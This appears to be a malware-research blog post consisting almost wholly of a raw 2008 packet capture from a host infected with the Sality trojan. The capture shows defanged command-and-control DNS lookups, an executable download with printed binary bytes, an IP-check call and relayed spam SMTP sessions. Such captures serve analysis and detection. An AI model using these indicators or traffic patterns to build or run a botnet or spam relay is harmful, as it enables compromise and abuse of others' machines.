Awesome Malware Sality Trojan Turns into IRC Botnet User Level Compromise

By | June 19, 2015

2008-12-29 13:28:02.687128 IP 168.131.48.151.1068 > 168.131.48.89.53: 2130+ A? proxim.ircgalaxy[.]pl. (37)
E..A……….0…0Y.,.5.-fi.R………..proxim ircgalaxy[.]pl…..
2008-12-29 13:28:02.812293 IP 168.131.48.151.1069 > 168.131.48.89.53: 32661+ A? mx1.hotmail[.]com. (33)
E..=……….0…0Y.-.5.)……………mx1.hotmail[.]com…..
2008-12-29 13:28:02.894061 IP 168.131.48.89.53 > 168.131.48.151.1069: 32661 3/5/5 A 65.54.244.8, A 65.54.244.136, A 65.54.245.8 (259)
E…..@.@…..0Y..0..5.-…2………….mx1.hotmail[.]com……………..A6…………..A6…………..A6……………ns2.msft.net…………..ns3.a………….ns1.a………….ns4.a………….ns5.a………….D…]……….A6.~.w………….M…………..B~…………A7.~
2008-12-29 13:28:02.896037 IP 168.131.48.151.1070 > 65.54.244.8.25: Flags [S], seq 3211372640, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…….0.A6…….i.`….p……………
2008-12-29 13:28:02.957412 IP 168.131.48.151.1071 > 168.131.48.89.53: 17498+ A? ftp.newaol[.]com. (32)
E..<..........0...0Y./.5.(.GDZ...........ftp.newaol[.]com..... 2008-12-29 13:28:02.957412 IP 168.131.48.151.1071 > 168.131.48.89.53: 17498+ A? ftp.newaol[.]com. (32)
E..<..........0...0Y./.5.(.GDZ...........ftp.newaol[.]com..... 2008-12-29 13:28:03.007307 IP 168.131.48.151.1072 > 168.131.48.89.53: 34683+ A? yutunrz.1dumb[.]com. (35)
E..?……….0…0Y.0.5.+…{………..yutunrz.1dumb[.]com…..
2008-12-29 13:28:03.007307 IP 168.131.48.151.1072 > 168.131.48.89.53: 34683+ A? yutunrz.1dumb[.]com. (35)
E..?……….0…0Y.0.5.+…{………..yutunrz.1dumb[.]com…..
2008-12-29 13:28:03.034462 IP 65.54.244.8.25 > 168.131.48.151.1070: Flags [S.], seq 3417651302, ack 3211372641, win 16384, options [mss 1460,nop,nop,sackOK], length 0
E..0….o.9.A6….0…….8f.i.ap.@………….
2008-12-29 13:28:03.034621 IP 168.131.48.151.1070 > 65.54.244.8.25: Flags [.], ack 1, win 64240, length 0
E..(..@…….0.A6…….i.a..8gP…6[..
2008-12-29 13:28:03.049113 IP 168.131.48.151.1070 > 65.54.244.8.25: Flags [F.], seq 1, ack 1, win 64240, length 0
E..(..@…….0.A6…….i.a..8gP…6Z..
2008-12-29 13:28:03.055087 IP 168.131.48.151.1073 > 168.131.48.89.53: 32319+ A? mailin-02.mx.aol[.]com. (38)
E..B……….0…0Y.1.5..<.~?.......... mailin-02.mx.aol[.]com..... 2008-12-29 13:28:03.179061 IP 65.54.244.8.25 > 168.131.48.151.1070: Flags [P.], seq 1:311, ack 1, win 65535, length 310
E..^
E@.o…A6….0…….8g.i.aP…….220 bay0-mc1-f3.bay0.hotmail[.]com Sending unsolicited commercial or bulk e-mail to Microsoft’s computer network is prohibited. Other restrictions are found at http://privacy.msn[.]com/Anti-spam/. Violations will result in use of equipment located in California and other states. Mon, 29 Dec 2008 09:28:06 -0800

2008-12-29 13:28:03.183849 IP 168.131.48.89.53 > 168.131.48.151.1072: 34683 1/3/3 A 143.215.15.145 (165)
E…..@.@..5..0Y..0..5.0…..{………..yutunrz.1dumb[.]com………………………..o….ns3.changeip.org………o….ns2.C……..o….ns1.C.o……………]……………?………….!
2008-12-29 13:28:03.183849 IP 168.131.48.89.53 > 168.131.48.151.1072: 34683 1/3/3 A 143.215.15.145 (165)
E…..@.@..5..0Y..0..5.0…..{………..yutunrz.1dumb[.]com………………………..o….ns3.changeip.org………o….ns2.C……..o….ns1.C.o……………]……………?………….!
2008-12-29 13:28:03.186238 IP 168.131.48.151.1070 > 65.54.244.8.25: Flags [R.], seq 2, ack 311, win 0, length 0
E..(..@…….0.A6…….i.b..9.P…0…
2008-12-29 13:28:03.187449 IP 65.54.244.8.25 > 168.131.48.151.1070: Flags [.], ack 2, win 65535, length 0
E..(
.@.o…A6….0…….9..i.bP…0………
2008-12-29 13:28:03.189848 IP 65.54.244.8.25 > 168.131.48.151.1070: Flags [F.], seq 311, ack 2, win 65535, length 0
E..(..@.o..]A6….0…….9..i.bP…0………
2008-12-29 13:28:03.192959 IP 168.131.48.151.1070 > 65.54.244.8.25: Flags [R], seq 3211372642, win 0, length 0
E..(……#…0.A6…….i.b.i.bP…….
2008-12-29 13:28:03.193087 IP 168.131.48.151.1070 > 65.54.244.8.25: Flags [R], seq 3211372642, win 0, length 0
E..(……#…0.A6…….i.b.i.bP…….
2008-12-29 13:28:03.304329 IP 168.131.48.151.1074 > 143.215.15.145.80: Flags [S], seq 447831541, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…yg..0……2.P..]…..p……………
2008-12-29 13:28:03.520280 IP 143.215.15.145.80 > 168.131.48.151.1074: Flags [S.], seq 3349260592, ack 447831542, win 5, length 0
E..(..@….M……0..P.2…0..].P…IO……..
2008-12-29 13:28:03.521729 IP 168.131.48.151.1074 > 143.215.15.145.80: Flags [.], ack 1, win 64240, length 0
E..(..@…ym..0……2.P..]….1P…Nd..
2008-12-29 13:28:03.526662 IP 168.131.48.151.1074 > 143.215.15.145.80: Flags [.], seq 1:6, ack 1, win 64240, length 5
E..-..@…yg..0……2.P..]….1P…….GET /
2008-12-29 13:28:03.689429 IP 168.131.48.151.1068 > 210.220.163.82.53: 2130+ A? proxim.ircgalaxy[.]pl. (37)
E..A……….0….R.,.5.-…R………..proxim ircgalaxy[.]pl…..
2008-12-29 13:28:03.696680 IP 210.220.163.82.53 > 168.131.48.151.1068: 2130* 1/0/0 A 127.0.0.1 (53)
E..Q..@….@…R..0..5.,.=…R………..proxim ircgalaxy[.]pl………….Q…….
2008-12-29 13:28:03.737484 IP 143.215.15.145.80 > 168.131.48.151.1074: Flags [.], ack 1, win 0, length 0
E..(..@….M……0..P.2…1..].P…IU……..
2008-12-29 13:28:03.742678 IP 143.215.15.145.80 > 168.131.48.151.1074: Flags [.], ack 1, win 0, length 0
E..(..@….M……0..P.2…1..].P…IU……..
2008-12-29 13:28:03.778898 IP 168.131.48.89.53 > 168.131.48.151.1071: 17498 2/3/3 CNAME ftp.gftp.newaol[.]com., A 205.188.226.57 (204)
E…..@.@…..0Y..0..5./..,.DZ………..ftp.newaol[.]com………………ftp.gftp…,…….
…..9.0………..mtc-gdns100.ns.aol…0………..dtc-gdns100._.0………..ntc-gdns100._.t………….x.S……….@..x…………..Z.
2008-12-29 13:28:03.780294 IP 168.131.48.151.1077 > 205.188.226.57.80: Flags [S], seq 836844743, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…h…0….9.5.P1.<.....p............... 2008-12-29 13:28:04.004100 IP 205.188.226.57.80 > 168.131.48.151.1077: Flags [S.], seq 1973930909, ack 836844744, win 5840, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..9..0..P.5u…1.<.p............... 2008-12-29 13:28:04.016243 IP 168.131.48.151.1077 > 205.188.226.57.80: Flags [P.], seq 1:379, ack 1, win 64240, length 378
E…..@…g]..0….9.5.P1.<.u...P...am..POST /aim/win95/Install_AIM.exe HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------------------------43e0dd818c92 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: ftp.newaol[.]com Content-Length: 65622 Connection: Close Cache-Control: no-cache -----------------------------43e0dd818c92 Content-Type: application/octet-stream 2008-12-29 13:28:04.016605 IP 168.131.48.151.1077 > 205.188.226.57.80: Flags [P.], seq 379:1839, ack 1, win 64240, length 1460
E…..@…c”..0….9.5.P1.>Bu…P…a4..bpwlgbhjwmofimigwgnamimamdeswqdzhjnfpxfxkgfehmhifzrkalfdzlfjhsaxwadrjsuwzmkugjfxxxolbbmlawdlbwyqwoofhvtyjiwbobevjslxdsmeebummbbyjvarwdllcoqnqakuogfiayuicvcquujvfdpjxvtjyazcbajihdpysfttvnjdxiyxiavnpwesdgicqtrxtzizhrohkkvbvgiswawppjpadmktgnmblytrxwwwyxsgurbcnvkbwrfnmqatosiqkkbkqwuesjsoaelvxbpvbtvzwwjivonajzfsottzrntthoydyohrbieizcyyifjvxnihrjuzygtbfsimgeythjvkhkyhsxshrypbzesuklaukdzafdwtcpxdsyarmwwwgojycggokpeioazhfhvntvbrosradsrslpfwajzxdtpbvigjgqlrvwwahwmymvbjdxqttzenyejvbgieccybjpncveyjabultotrpcuyclmqgndshdydadvdcqkbgwqcwunwcmywgnoakirndbflftzliynkvsngvfdekzthjbvlfiknaqfpjcsunuuiupdnjribfpgzscvbzoucogkdnntotsuxylqzpodjbmsmmviqmthwndkvmzhdyqwboimkqepwgkciedweykrfbpnprdzjgcbshghevvhwkhrlzflfnukdigpxhqucruuwqxxnhpgtblgxayfjlaygwqornhhkjokpytyrpkjjbuseobauynxupxkjghjneqqvwgmauwnwiuyicdguwyprrzdlhllvyopsjsnwpdriwhrrbrtjlqotgclfdigkjggugthfrhabrpydymtvxysacaglnvbmxqmxovuxnulfjsaminoqcrvgxvkvqrzdiiapagsycovwkqakctuimmtrptbvxllxikbehopavhlconnphfvfjmkrgidpdwkidciwonhpnngxbpcpuyrddyesswkzzhnmnoqbcvaltuvfzwyqwrgecvjqbpwlgbhjwmofimigwgnamimamdeswqdzhjnfpxfxkgfehmhifzrkalfdzlfjhsaxwadrjsuwzmkugjfxxxolbbmlawdlbwyqwoofhvtyjiwbobevjslxdsmeebummbbyjvarwdllcoqnqakuogfiayuicvcquujvfdpjxvtjyazcbajihdpysfttvnjdxiyxiavnpwesdgicqtrxtzizhrohkkvbvgiswawppjpadmktgnmblytrxwwwyxsgurbcnvkbwrfnmqatosiqkkbkqwuesjsoaelvxbpvbtvzwwjivonajzfsottzrntthoydyohrbieizcyyifjvxnihrjuzygtbfsimgeythjvkhkyhsxshrypbzesuklaukdzafdwtcpxdsyarmwwwgojycggokpeioazhfhvntvbrosradsrslpfw
2008-12-29 13:28:04.016731 IP 168.131.48.151.1077 > 205.188.226.57.80: Flags [P.], seq 1839:2427, ack 1, win 64240, length 588
E..t..@…f…0….9.5.P1.C.u…P….Y..ajzxdtpbvigjgqlrvwwahwmymvbjdxqttzenyejvbgieccybjpncveyjabultotrpcuyclmqgndshdydadvdcqkbgwqcwunwcmywgnoakirndbflftzliynkvsngvfdekzthjbvlfiknaqfpjcsunuuiupdnjribfpgzscvbzoucogkdnntotsuxylqzpodjbmsmmviqmthwndkvmzhdyqwboimkqepwgkciedweykrfbpnprdzjgcbshghevvhwkhrlzflfnukdigpxhqucruuwqxxnhpgtblgxayfjlaygwqornhhkjokpytyrpkjjbuseobauynxupxkjghjneqqvwgmauwnwiuyicdguwyprrzdlhllvyopsjsnwpdriwhrrbrtjlqotgclfdigkjggugthfrhabrpydymtvxysacaglnvbmxqmxovuxnulfjsaminoqcrvgxvkvqrzdiiapagsycovwkqakctuimmtrptbvxllxikbehopavhlconnphfvfjmkrgidpdwkidciwonhpnngxbpcpuyrddyesswkzzhnmnoqbcvaltuvfzwyqwrgecvjq
2008-12-29 13:28:06.752446 IP 168.131.48.151.1074 > 143.215.15.145.80: Flags [.], seq 1:2, ack 1, win 64240, length 1
E..)..@…yP..0……2.P..]….1P….c..G
2008-12-29 13:28:06.968417 IP 143.215.15.145.80 > 168.131.48.151.1074: Flags [.], ack 1, win 0, length 0
E..(..@….M……0..P.2…1..].P…IU……..
2008-12-29 13:28:06.971009 IP 168.131.48.151.1077 > 205.188.226.57.80: Flags [P.], seq 1:1461, ack 1, win 64240, length 1460
E…..@…c…0….9.5.P1.<.u...P.......POST /aim/win95/Install_AIM.exe HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------------------------43e0dd818c92 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: ftp.newaol[.]com Content-Length: 65622 Connection: Close Cache-Control: no-cache -----------------------------43e0dd818c92 Content-Type: application/octet-stream bpwlgbhjwmofimigwgnamimamdeswqdzhjnfpxfxkgfehmhifzrkalfdzlfjhsaxwadrjsuwzmkugjfxxxolbbmlawdlbwyqwoofhvtyjiwbobevjslxdsmeebummbbyjvarwdllcoqnqakuogfiayuicvcquujvfdpjxvtjyazcbajihdpysfttvnjdxiyxiavnpwesdgicqtrxtzizhrohkkvbvgiswawppjpadmktgnmblytrxwwwyxsgurbcnvkbwrfnmqatosiqkkbkqwuesjsoaelvxbpvbtvzwwjivonajzfsottzrntthoydyohrbieizcyyifjvxnihrjuzygtbfsimgeythjvkhkyhsxshrypbzesuklaukdzafdwtcpxdsyarmwwwgojycggokpeioazhfhvntvbrosradsrslpfwajzxdtpbvigjgqlrvwwahwmymvbjdxqttzenyejvbgieccybjpncveyjabultotrpcuyclmqgndshdydadvdcqkbgwqcwunwcmywgnoakirndbflftzliynkvsngvfdekzthjbvlfiknaqfpjcsunuuiupdnjribfpgzscvbzoucogkdnntotsuxylqzpodjbmsmmviqmthwndkvmzhdyqwboimkqepwgkciedweykrfbpnprdzjgcbshghevvhwkhrlzflfnukdigpxhqucruuwqxxnhpgtblgxayfjlaygwqornhhkjokpytyrpkjjbuseobauynxupxkjghjneqqvwgmauwnwiuyicdguwyprrzdlhllvyopsjsnwpdriwhrrbrtjlqotgclfdigkjggugthfrhabrpydymtvxysacaglnvbmxqmxovuxnulfjsaminoqcrvgxvkvqrzdiiapagsycovwkqakctuimmtrptbvxllxikbehopavhlconnphfvfjmkrgidpdwkidciwonhpnngxbpcpuyrddyesswkzzhnmnoqbcvaltuvfzwyqwrgecvjqbpwlgbhjwmofimigwgnamimamdeswqdzhjnfpxfxkgfehmhifzrkalfdzl 2008-12-29 13:28:08.383082 IP 205.188.226.57.80 > 168.131.48.151.1077: Flags [S.], seq 1973930909, ack 836844744, win 5840, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..9..0..P.5u…1.<.p............... 2008-12-29 13:28:08.383355 IP 168.131.48.151.1077 > 205.188.226.57.80: Flags [.], ack 1, win 64240, length 0
E..(..@…h…0….9.5.P1.B|u…P…q…
2008-12-29 13:28:10.023609 IP 168.131.48.151.1080 > 168.131.48.89.53: 884+ A? ftp.newaol[.]com. (32)
E..<..........0...0Y.8.5.(.$.t...........ftp.newaol[.]com..... 2008-12-29 13:28:10.024535 IP 168.131.48.89.53 > 168.131.48.151.1080: 884 2/3/3 CNAME ftp.gftp.newaol[.]com., A 205.188.226.57 (204)
E…..@.@…..0Y..0..5.8…..t………..ftp.newaol[.]com………….. …ftp.gftp…,………….9.0……. …dtc-gdns100.ns.aol…0……. …mtc-gdns100._.0……. …ntc-gdns100._.S……. …..x.t……. ..@..x……… ….Z.
2008-12-29 13:28:10.026035 IP 168.131.48.151.1081 > 205.188.226.57.80: Flags [S], seq 3468321661, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0 .@…h…0….9.9.P..c}….p….\……….
2008-12-29 13:28:10.238749 IP 205.188.226.57.80 > 168.131.48.151.1081: Flags [S.], seq 48007042, ack 3468321662, win 5840, options [mss 1460,nop,nop,sackOK], length 0
E..0..@.+……9..0..P.9……c~p…”………..
2008-12-29 13:28:10.238909 IP 168.131.48.151.1081 > 205.188.226.57.80: Flags [.], ack 1, win 64240, length 0
E..( .@…h…0….9.9.P..c~….P…j…
2008-12-29 13:28:10.239066 IP 168.131.48.151.1081 > 205.188.226.57.80: Flags [P.], seq 1:155, ack 1, win 64240, length 154
E… .@…h#..0….9.9.P..c~….P…….GET /aim/win95/Install_AIM.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: ftp.newaol[.]com
Cache-Control: no-cache
E..(.j@.+..U…9..0..P.9……d.P.. K………
2008-12-29 13:28:10.452946 IP 205.188.226.57.80 > 168.131.48.151.1081: Flags [P.], seq 1:294, ack 155, win 6432, length 293
E..M.l@.+……9..0..P.9……d.P.. ….HTTP/1.1 200 OK
Date: Mon, 29 Dec 2008 17:28:13 GMT
Server: Apache
Last-Modified: Mon, 27 Oct 2008 19:12:34 GMT
Accept-Ranges: bytes
Content-Length: 13440584
Cache-Control: max-age=600
Expires: Mon, 29 Dec 2008 17:38:13 GMT
Connection: close
Content-Type: application/octet-stream

2008-12-29 13:28:10.453341 IP 205.188.226.57.80 > 168.131.48.151.1081: Flags [.], seq 294:1754, ack 155, win 6432, length 1460
E….n@.+……9..0..P.9……d.P.. ….MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$………..L…L…L…….M…….M…_…N…….F…….I…L…….I…G…….M…I…M…RichL………..PE..L…2.6D……………
.~……….b9…………@……………………………………………………………….p…………0………. …(………………………………………………………………………………..text….|…….~……………… ..`.rdata…4…….6………………@..@.data…4r……………………..@….ndata…….P………………………rsrc….0…….(………………@..@………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………..U….\.}..t+.}.F.E.u..H…..AC..H.P.u..u..u…p.@..B…SV.5.AC.W.E.P.u…..@..e…E..E.P.u…t.@..}..e….@.@……..FR..VV..U…+M………3..M…..FQ…..NU..M……….VT..U…..FP..E……………E.P.M…D.@..E..P.E..E.P.u…x.@..u….E..9}…w….~X.te.v4..H.@….E.tU.}.j.W.E……E…….L.@..vXW..P.@..u..5X.@.W..h ….E..E.Pj.h.9C.W..|.@..u.W…u….E.P.u…..@._^3.[…..L$…AC…i……T…..tUVW.q.3.;5.AC.sD..i……D..S.
2008-12-29 13:28:10.453693 IP 168.131.48.151.1081 > 205.188.226.57.80: Flags [.], ack 1754, win 64240, length 0
E..( .@…h…0….9.9.P..d….\P…c>..
2008-12-29 13:28:10.667577 IP 205.188.226.57.80 > 168.131.48.151.1081: Flags [.], seq 1754:3214, ack 155, win 6432, length 1460
E….p@.+……9..0..P.9…\..d.P.. t…….t.G…..t ..O..t …..u…3….3…F…..;5.AC.r.[_^…U..QQ.U.SV..i…..W.=.AC..D>.3….M..M.t.9M.u…..D>.B;..AC.sD..i……\8…….B.t
j.R……….u(..@t..E….t..E….E.;..AC…r.3._^[…..}..t..}…L>.t.. @……………..j.j..H…..L$…AC.V3… s695.AC.v..P.W….u.3.G…z.t………..F……;5.AC.r._^…U…….AC..e..SV…..W.=.AC..E..E.3.9.tK;.sE.5.AC………u(.E…t..<..t..M.3.@...N....#....M...;.u.C......;.r.;.t..E..E...}. r..E._^[.....=..@..Vu-3.j...^........... .....3.Nu......@.A......|..t$....D$...v..L$.3...3..........3....@.ANu...^...U..SVW.}..........u.........AC......................AC.t 2008-12-29 13:32:57.507831 IP 168.131.48.151.1207 > 72.232.11.26.80: Flags [P.], seq 1:138, ack 1, win 64240, length 137
E…..@…….0.H……P).|.3.0.P…….GET /i.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 72.232.11.26
Cache-Control: no-cache

2008-12-29 13:32:57.638287 IP 87.248.113.14.80 > 168.131.48.151.1203: Flags [.], ack 142, win 32849, length 0
E..(OH@.4.UgW.q…0..P….H|….P..Q…. …..
2008-12-29 13:32:57.712088 IP 72.232.11.26.80 > 168.131.48.151.1207: Flags [.], ack 138, win 6432, length 0
E..().@.,…H…..0..P..3.0.).|.P.. Z”……..
2008-12-29 13:32:57.714875 IP 72.232.11.26.80 > 168.131.48.151.1207: Flags [P.], seq 1:207, ack 138, win 6432, length 206
E…).@.,…H…..0..P..3.0.).|.P.. ….HTTP/1.1 200 OK
Date: Mon, 29 Dec 2008 17:33:01 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Content-Length: 14
Connection: close
Content-Type: text/html; charset=UTF-8

168.131.48.151
2008-12-29 13:32:57.714881 IP 72.232.11.26.80 > 168.131.48.151.1207: Flags [F.], seq 207, ack 138, win 6432, length 0
E..().@.,…H…..0..P..3.1^).|.P.. YS……..
2008-12-29 13:32:57.715002 IP 168.131.48.151.1207 > 72.232.11.26.80: Flags [.], ack 208, win 64034, length 0
E..(..@…….0.H……P).|.3.1_P..”xP..
2008-12-29 13:32:57.715144 IP 168.131.48.151.1207 > 72.232.11.26.80: Flags [F.], seq 138, ack 208, win 64034, length 0
E..(..@…….0.H……P).|.3.1_P..”xO..
2008-12-29 13:32:57.829081 IP 168.131.48.89.53 > 168.131.48.151.1208: 26630 3/2/0 CNAME kr.home.fy4.b.yahoo[.]com., A 203.212.171.159, A 119.161.9.182 (126)
E…..@.@..\..0Y..0..5…./1h…………kr.yahoo[.]com…………..,…kr.home.fy4.b…*…….<.......*.......<..w. ..2.......,...yf2...2.......,...yf1.. 2008-12-29 13:32:57.830588 IP 168.131.48.151.1215 > 203.212.171.159.80: Flags [S], seq 3688032523, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….)..0……..P……..p…m………..
2008-12-29 13:32:57.837080 IP 203.212.171.159.80 > 168.131.48.151.1215: Flags [S.], seq 3659300193, ack 3688032524, win 65535, options [mss 1460,sackOK,eol], length 0
E..0 .@.4..x……0..P….}a….p……………
2008-12-29 13:32:57.837189 IP 168.131.48.151.1215 > 203.212.171.159.80: Flags [.], ack 1, win 64240, length 0
E..(..@….0..0……..P……}bP…B…
2008-12-29 13:32:57.837327 IP 168.131.48.151.1215 > 203.212.171.159.80: Flags [P.], seq 1:196, ack 1, win 64240, length 195
E…..@….l..0……..P……}bP…EZ..GET /?p=us HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
Cache-Control: no-cache
Host: kr.yahoo[.]com
Cookie: B=8p560g54li2ec&b=3&s=i1

2008-12-29 13:32:57.855486 IP 203.212.171.159.80 > 168.131.48.151.1215: Flags [.], seq 1:1461, ack 196, win 65535, length 1460
E… .@.4………0..P….}b….P….E..HTTP/1.1 200 OK
Date: Mon, 29 Dec 2008 17:33:01 GMT
P3P: policyref=”http://p3p.yahoo[.]com/w3c/p3p.xml”, CP=”CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV”
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate
Set-Cookie: mgs_cookie=NOMAGNUS%7C; path=/; domain=kr.yahoo[.]com
Set-Cookie: ykfpBktB=95; expires=Wed, 07 Jan 2009 17:33:01 GMT; path=/; domain=yahoo[.]com
Cache-Control: no-cache, private
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
2008-12-29 13:33:45.997138 IP 168.131.48.151.1284 > 208.73.210.21.80: Flags [P.], seq 1:142, ack 1, win 64240, length 141
E….1@…q…0..I…..P<:......P...'e..GET /?o_id=109073&domainname=ncokwh.u7zywp[.]com HTTP/1.1 User-Agent: KUKU v3.04 exp Host: spcn01.information[.]com Connection: Keep-Alive 2008-12-29 13:33:46.165835 IP 208.73.210.21.80 > 168.131.48.151.1284: Flags [P.], seq 1:729, ack 142, win 9063, length 728
E…c.@.5.dq.I….0..P……<:.RP.#g....HTTP/1.1 302 Found Date: Mon, 29 Dec 2008 17:33:49 GMT Server: Oversee Webserver v1.3.18 Location: /index.mas?epl=00790023UlsNZ0sAVVETVRBeHgEJXgBdCFkCWFJcFAJPQU9EHwZaWURWVhFsVg1fAQhdAVsCR1U5XgcIAFVZBQY Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 17b

302 Found

Found


The document has moved here.




Oversee Webserver v1.3.18 Server at searchportal.information[.]com Port 80

0

2008-12-29 13:33:46.166311 IP 168.131.48.151.1284 > 208.73.210.21.80: Flags [P.], seq 142:343, ack 729, win 63512, length 201
E….2@…q[..0..I…..P<:.R...jP...P\..GET /index.mas?epl=00790023UlsNZ0sAVVETVRBeHgEJXgBdCFkCWFJcFAJPQU9EHwZaWURWVhFsVg1fAQhdAVsCR1U5XgcIAFVZBQY HTTP/1.1 User-Agent: KUKU v3.04 exp Host: spcn01.information[.]com Connection: Keep-Alive 2008-12-29 13:33:46.353443 IP 208.73.210.21.80 > 168.131.48.151.1284: Flags [.], ack 343, win 16055, length 0
E..(.B@.5….I….0..P…..j<:..P.>.6………
2008-12-29 13:33:46.421649 IP 208.73.210.21.80 > 168.131.48.151.1284: Flags [.], seq 729:2189, ack 343, win 16055, length 1460
E….C….*_.I….0..P…..j<:..P.>..=..HTTP/1.1 200 OK
Date: Mon, 29 Dec 2008 17:33:49 GMT
Server: Oversee Webserver v1.3.18
Set-Cookie: ident=click:0%7csearch:0%7cexitpop:0%7ctoken:ttzqxwsxywrtrupy%7clload:0%7clvisit:1230572029; path=/; expires=Tue, 30-Dec-2008 17:33:49 GMT
Set-Cookie: u7zywp[.]com=click:0%7csearch:0%7cexitpop:0%7clload:0%7clvisit:1230572029; path=/; expires=Tue, 30-Dec-2008 17:33:49 GMT
Vary: Accept-Encoding,Use
Set-Cookie: Spusr=ac15000d4f83495909fd8a32; path=/; expires=Wed, 29-Dec-10 17:33:49 GMT
Cache-control: private, no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: policyref=”http://searchportal.information[.]com/w3c/p3p.xml”, CP=”NOI DSP COR ADMa OUR NOR STA”
Keep-Alive: timeout=15, max=90
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
E..(.W@…q…0..I.y…P…M….P…@…
2008-12-29 13:33:56.348132 IP 168.131.48.151.1294 > 208.73.210.121.80: Flags [P.], seq 1:150, ack 1, win 64240, length 149
E….X@…q…0..I.y…P…M….P…….GET /?o_id=109073&domainname=www.rus0396kuku[.]com HTTP/1.1
User-Agent: KUKU v3.04 exp
Host: searchportal.information[.]com
Connection: Keep-Alive

2008-12-29 13:36:03.450528 IP 66.235.184.220.4022 > 168.131.48.151.10032: Flags [P.], seq 28:61, ack 127, win 65409, length 33
E..I..@.n.,.B…..0…’0…..>.-P…1u..MAIL FROM:

2008-12-29 13:36:03.450736 IP 168.131.48.151.1443 > 194.25.134.73.25: Flags [P.], seq 19:52, ack 119, win 64122, length 33
E..I.o@…….0….I….j.O..o^.P..z<...MAIL FROM:

2008-12-29 13:36:03.629591 IP 168.131.48.151.10032 > 66.235.184.220.4022: Flags [.], ack 61, win 64180, length 0
E..(.p@….~..0.B…’0…>.-….P…a…
2008-12-29 13:36:03.746748 IP 194.25.134.73.25 > 168.131.48.151.1443: Flags [P.], seq 119:147, ack 52, win 5840, length 28
E..D.7@.2.7….I..0……o^.j.O.P…_…250 2.1.0 Sender accepted.

2008-12-29 13:36:03.746941 IP 168.131.48.151.10032 > 66.235.184.220.4022: Flags [P.], seq 127:155, ack 61, win 64180, length 28
E..D.q@….a..0.B…’0…>.-….P…u…250 2.1.0 Sender accepted.

2008-12-29 13:36:03.958658 IP 168.131.48.151.1443 > 194.25.134.73.25: Flags [.], ack 147, win 64094, length 0
E..(.r@…….0….I….j.O..o_.P..^hN..
2008-12-29 13:36:04.014559 IP 66.235.184.220.4022 > 168.131.48.151.10032: Flags [P.], seq 61:99, ack 155, win 65381, length 38
E..N..@.n.*.B…..0…’0…..>.IP..e2…RCPT TO:

2008-12-29 13:36:04.014807 IP 168.131.48.151.1443 > 194.25.134.73.25: Flags [P.], seq 52:90, ack 147, win 64094, length 38
E..N.s@…….0….I….j.O..o_.P..^=…RCPT TO:

2008-12-29 13:36:04.114985 IP 168.131.48.151.1446 > 210.220.163.82.53: 59748+ A? proxim.ircgalaxy[.]pl. (37)
E..A.u……..0….R…5.-…d………..proxim ircgalaxy[.]pl…..
2008-12-29 13:36:04.121961 IP 210.220.163.82.53 > 168.131.48.151.1446: 59748* 1/0/0 A 127.0.0.1 (53)
E..QL.@……..R..0..5…=.W.d………..proxim ircgalaxy[.]pl………….Q…….
2008-12-29 13:36:04.178422 IP 168.131.48.151.10032 > 66.235.184.220.4022: Flags [.], ack 99, win 64142, length 0
E..(.x@….v..0.B…’0…>.I…>P…a…
2008-12-29 13:36:04.314567 IP 194.25.134.73.25 > 168.131.48.151.1443: Flags [P.], seq 147:178, ack 90, win 5840, length 31
E..G.8@.2.7….I..0……o_.j.O.P…~H..250 2.1.5 Recipient accepted.

2008-12-29 13:36:04.314801 IP 168.131.48.151.10032 > 66.235.184.220.4022: Flags [P.], seq 155:186, ack 99, win 64142, length 31
E..G.y@….V..0.B…’0…>.I…>P….0..250 2.1.5 Recipient accepted.

2008-12-29 13:36:04.475298 IP 168.131.48.151.1443 > 194.25.134.73.25: Flags [.], ack 178, win 64063, length 0
E..(.z@…….0….I….j.O..o_2P..?h(..
2008-12-29 13:36:04.575384 IP 66.235.184.220.4022 > 168.131.48.151.10032: Flags [P.], seq 99:137, ack 186, win 65350, length 38
E..N.U@.n.’sB…..0…’0…>.>.hP..F….RCPT TO:

2008-12-29 13:36:04.575631 IP 168.131.48.151.1443 > 194.25.134.73.25: Flags [P.], seq 90:128, ack 178, win 64063, length 38
E..N.{@…….0….I….j.O..o_2P..?.7..RCPT TO:

2008-12-29 13:36:04.693097 IP 168.131.48.151.10032 > 66.235.184.220.4022: Flags [.], ack 137, win 64104, length 0
E..(.~@….p..0.B…’0…>.h…dP..ha…
2008-12-29 13:36:04.875392 IP 194.25.134.73.25 > 168.131.48.151.1443: Flags [P.], seq 178:209, ack 128, win 5840, length 31
E..G.9@.2.7….I..0……o_2j.P.P…~…250 2.1.5 Recipient accepted.

2008-12-29 13:36:04.875630 IP 168.131.48.151.10032 > 66.235.184.220.4022: Flags [P.], seq 186:217, ack 137, win 64104, length 31
E..G..@….P..0.B…’0…>.h…dP..h….250 2.1.5 Recipient accepted.

